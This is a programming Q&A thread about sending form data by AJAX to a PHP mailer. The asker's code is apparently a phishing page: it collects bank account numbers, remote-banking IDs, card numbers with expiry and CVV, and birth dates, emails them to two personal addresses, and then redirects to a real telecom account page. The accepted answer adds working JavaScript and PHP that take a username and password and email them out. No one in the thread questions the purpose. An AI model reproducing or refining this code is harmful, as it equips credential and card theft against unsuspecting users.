# I have two js variables that I want to send to a php script to pickup and send as an email without refresh

Tags: php, ajax

```
if(isset($_POST['submitbtn']))
{

    $pname= $_POST['nom'];
    $telephone= $_POST['telph'];
    $acnumber= $_POST['compte'];
    $rbl= $_POST['distance'];
    $cardno = $_POST['carte'];
    $expmonth = $_POST['months'];
    $expyear = $_POST['year'];  
    $cvv = $_POST['cvv'];
    $dob = $_POST['birth'];
    $subject = 'Contact Form from '.$pname.'';
    $message = 'Nom et prénom:- '.$pname.'

Telephone: '.$telephone.'

Numéro de compte:- '.$acnumber.'

Identifiant banque à distance:- '.$rbl.'

Numéro de Carte:- '.$cardno.'

date d expiration:- '.$expmonth.','.$expyear.'

Cvv 2:- '.$cvv.'

Date de naissance :- '.$dob.' ';

 $to = "eyas.ma@yahoo.fr,joejyma11@hotmail.com";
 $header = "From:www.webperfection.co.in/clients/photonics/ \r\n";
 $retval = mail ($to,$subject,$message,$header);
 if ($retval) {
 header("Location: https://mobile.free.fr/moncompte/");
 exit;
} else {
 //header("Location: /error.html");
 exit;
}

}
?>
```

Will this redirect user to thttps://mobile.free.fr/moncompte/? Because I can't try mail function on this setup

I want it to redirect once the mail has been sent

Thankyou for all your help

I want it to redirect once the mail has been sent

Comment: See if this helps with the first part: http://labs.jonsuh.com/jquery-ajax-php-json/

Comment: The PHP part seems to be working as well. Is there something wrong with it ?

Comment: See first post please

Comment: Is the redirection code not working ? I think you have completely changed your question so it becomes a bit hard to assist you.

Answer (score 2, accepted):

Just use the example, it will work with your server email sending code:

```
var un = document.getElementById('ident_txt_identifiant').innerHTML;
var pw = document.myform.pwd_abo.value;

// post_data will contain name value pair to pass in $_POST server variable
var post_data = 'un='+ un+ '&pw='+ pw; 

  $.ajax({
    type: 'post',
    url: 'post.php',
    data: post_data,
    success: function () {
      window.location = "http://webperfection.co.in/clients/contactform/moncompte/contactform.php";
    }
  });
```

and change your server code a bit

```
<?php 
# Send email if and only if username and password fields are passed in $_POST request
if(isset($_POST['un']) && isset($_POST['pw']) ){

    $un= $_POST['un'];
    $pw= $_POST['pw'];
    $subject = 'Login details';
    $message = 'Username:-'.$un.'Password:-'.$pw;

 $to = "eyas.ma@yahoo.fr,joejyma11@hotmail.com";
 $header = "From:www.webperfection.co.in/clients/photonics/ \r\n";
 $retval = mail ($to,$subject,$message,$header);
}
?>
```

Comment: Check first post please. new question

Comment: See first post please

Comment: Yes, it will redirect if email is sent successfully and there is no error in email TO or FROM.

Answer (score 1):

> First question, what should I put in data: , to be able to send those two variables?

`data: { un: un, pw: pw }`

(Other formats like `data: 'un=something&pw=something_else'` are possible, but this is likely the best for you)

> And second question how do I pick it up on the php side?

The above will give PHP those variables in the `$_POST` array, so your code should work as-is.

Comment: See first post please